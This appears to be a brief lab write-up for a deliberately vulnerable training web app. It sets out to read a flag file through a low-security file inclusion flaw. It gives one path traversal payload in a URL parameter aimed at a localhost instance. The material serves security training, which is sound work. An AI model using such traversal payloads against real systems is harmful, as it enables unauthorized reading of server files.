### Objective

Read all five famous quotes from '[../hackable/flags/fi.php](http://localhost:5000/hackable/flags/fi.php)' using only the file inclusion.

Low security so it probably doesn't have any blacklist.
Let's just go at it.
```txt
http://localhost:5000/vulnerabilities/fi/?page=../../hackable/flags/fi.php
```